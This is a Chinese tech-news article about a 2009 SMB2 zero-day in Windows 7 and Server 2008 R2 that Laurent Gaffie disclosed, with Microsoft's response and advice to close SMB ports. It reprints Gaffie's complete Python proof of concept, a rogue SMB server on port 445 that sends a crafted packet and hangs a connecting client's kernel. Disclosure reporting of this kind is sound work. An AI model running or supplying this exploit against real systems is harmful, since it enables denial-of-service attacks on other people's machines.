Win7再曝零日漏洞 微软称正在调查(附测试代码)

安全
安全专家Laurent Gaffie昨日在博客中曝光了这一漏洞,并将其定级为中高级别漏洞,Laurent Gaffie表示这个漏洞会导致SMB协议进入无限死循环,他还进行了完整代码演示。目前还没有任何修复该漏洞的补丁,Gaffie建议用户在微软发布相关补丁前关闭SMB功能和端口。

微软昨日证实,有报告指出Windows 7和Windows Server 2008 R2中存在一个漏洞,可被用来进行远程攻击系统,并导致系统内核崩溃,微软目前正在就此问题进行调查。

微软官方发言人表示,此漏洞为Windows网络文件和打印共享协议Server Message Block(SMB)中存在的拒绝式服务漏洞,不过迄今为止微软还没有发现利用此漏洞实施攻击行为的案例。

安全专家Laurent Gaffie昨日在博客中曝光了这一漏洞,并将其定级为中高级别漏洞,Laurent Gaffie表示这个漏洞会导致SMB协议进入无限死循环,他还进行了完整代码演示。目前还没有任何修复该漏洞的补丁,Gaffie建议用户在微软发布相关补丁前关闭SMB功能和端口。

Gaffie指出,无论你的防火墙是如何设置的,黑客都有可能在局域网内或是利用IE对你的系统进行攻击。Gaffie表示,该漏洞仅影响Windows 7和Windows Server 2008 R2,并不对其它系统造成影响。

附代码演示:

  #win7-crash.py:

  #Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)

  #Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.

  #NO BSOD, YOU GOTTA PULL THE PLUG.

  #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash

  #Author: Laurent Gaffié

  #

  import SocketServer

  packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..

  "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"

  "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

  "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"

  "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"

  "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"

  "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"

  "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"

  "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

  class SMB2(SocketServer.BaseRequestHandler):

  def handle(self):

  print "Who:", self.client_address

  print "THANKS SDL"

  input = self.request.recv(1024)

  self.request.send(packet)

  self.request.close()

  launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445

  launch.serve_forever()

【编辑推荐】

  1. 微软2009年11月安全公告发布 6个补丁15个漏洞
  2. 2009年世界顶级杀毒软件排行(ToptenReviews)
  3. 德国信息安全部门警告网民不要使用Chrome上网
  4. 360杀毒一举超越卡巴斯基?
  5. 趋势科技发文挑衅VB100 金山对此不以为然
  6. 趋势退出VB100病毒测试 强调评测与病毒的不对等博弈
  7. 趋势科技:云安全是安全领域的一场工业革命
  8. 51CTO云安全专题页

责任编辑:王文文 来源: 驱动之家
相关推荐

2014-06-19 13:42:21

2011-12-29 13:54:27

2011-12-29 10:14:54

2020-03-25 09:40:57

微软浏览器Windows

2023-08-23 11:44:37

2015-02-02 15:29:08

2013-11-11 17:13:05

2009-05-05 08:43:59

微软Windows 7操作系统

2013-11-11 10:27:14

2009-03-06 08:45:42

Windows 7商用功能企业用户

2013-10-15 10:22:43

2010-01-19 21:01:28

2009-09-30 10:36:34

2021-11-26 15:03:51

Windows零日漏洞恶意软件

2009-11-13 08:41:46

2009-05-14 20:50:47

2009-07-06 08:36:27

微软Windows 7零售版

2009-07-01 09:01:35

微软Windows 7升级

2009-04-20 08:51:48

Windows 7微软操作系统

2009-04-27 23:45:07

点赞
收藏

51CTO技术栈公众号